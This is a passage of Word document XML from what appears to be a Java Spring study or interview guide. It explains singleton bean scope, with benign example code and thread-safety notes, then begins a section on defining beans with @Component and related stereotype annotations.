        <w:t>@Componen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cope("singleton") is optional, as it's default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB64EF" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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063415"/>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SingletonServic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B4C0961" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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063415"/>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SingletonServi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F109EF0" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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06341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ingleton Bean Created"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE28B7" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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06341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AEDEB40" w14:textId="1B784857" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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063415"/>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45418355" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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used in a config file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A908C" w14:textId="2D617065" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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133225"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;bean</w:t>
      </w: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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"myBean"</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"com.example.MyBean"</w:t>
      </w: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scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"singleton"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640755FB" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FA6B5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C1B6644">
          <v:rect id="_x0000_i2081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A65D0" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">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hen to Use Singleton Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA0980E" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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the bean is stateless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF63377" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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want to reuse resources (like DAOs, services, utility classes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49214907" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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want to avoid object creation overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB617E" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FA6B5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22F00DE">
          <v:rect id="_x0000_i2082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D7F157" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">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Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61529D40" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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have a NotificationService bean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A98B0" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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6277630"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE041D3" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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6277630"/>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NotificationServic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84A03BB" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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62776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send</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ms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A7E1319" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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62776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ending notification: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sg</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF6AB7" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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627763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F4E2A1E" w14:textId="3B1010F5" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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6277630"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E557670" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B5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can safely be a singleton, since it doesn’t hold state specific to any request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD55BD" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FA6B5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0410709">
          <v:rect id="_x0000_i2083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF3690" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">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Important Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9CF260" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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multiple threads access the singleton bean and modify shared state → you must handle thread safety manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490B3254" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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s container-specific: if you load multiple ApplicationContexts, each will have its own singleton bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96981B" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FA6B5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9B7BB8F">
          <v:rect id="_x0000_i2084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25562A9D" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD849A" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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cope("singleton") or default scope in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4F14C" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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e instance for the entire application context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69B312" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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deal for stateless, shared components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540797CC" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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t thread-safe by default, so handle carefully if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42575A48" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FA6B5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8A34E3E">
          <v:rect id="_x0000_i2085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A4FF2" w14:textId="036B83E4" w:rsidR="007F561C" w:rsidRPr="00CE4B95" w:rsidRDefault="007F561C" w:rsidP="007F561C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="430" w:name="_Toc196307910"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you define a bean in Spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="430"/>
    </w:p>
    <w:p w14:paraId="4A619608" w14:textId="06980653" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="009E373C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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1. Using Annotations (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC590D1" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is the most modern and commonly used way (especially in Spring Boot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFAB0F4" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E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525"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256367F8" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E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525"/>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Bea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1985B13" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E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52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doSometh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CEADAC4" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E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52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Doing something..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D77C93" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E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52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19361CD" w14:textId="315DAD7A" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E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525"/>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69F52E72" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring will automatically detect and register this bean if </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enabled (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ComponentScan</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or part of a Spring Boot app).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E03A9AC" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You can also use more specific stereotyp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7"/>
        <w:gridCol w:w="2086"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="288699C8" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9118A7" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726BB188" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use For</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="6D33D62B" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC64C5F" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="286CB3A0" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Generic component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w14:paraId="35C82D44" w14:textId="77777777" w:rsidTr="008E5E16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78AC0FAD" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BE25AF4" w14:textId="77777777" w:rsidR="008E5E16" w:rsidRPr="00CE4B95" w:rsidRDefault="008E5E16" w:rsidP="008E5E16">
            <w:pPr>
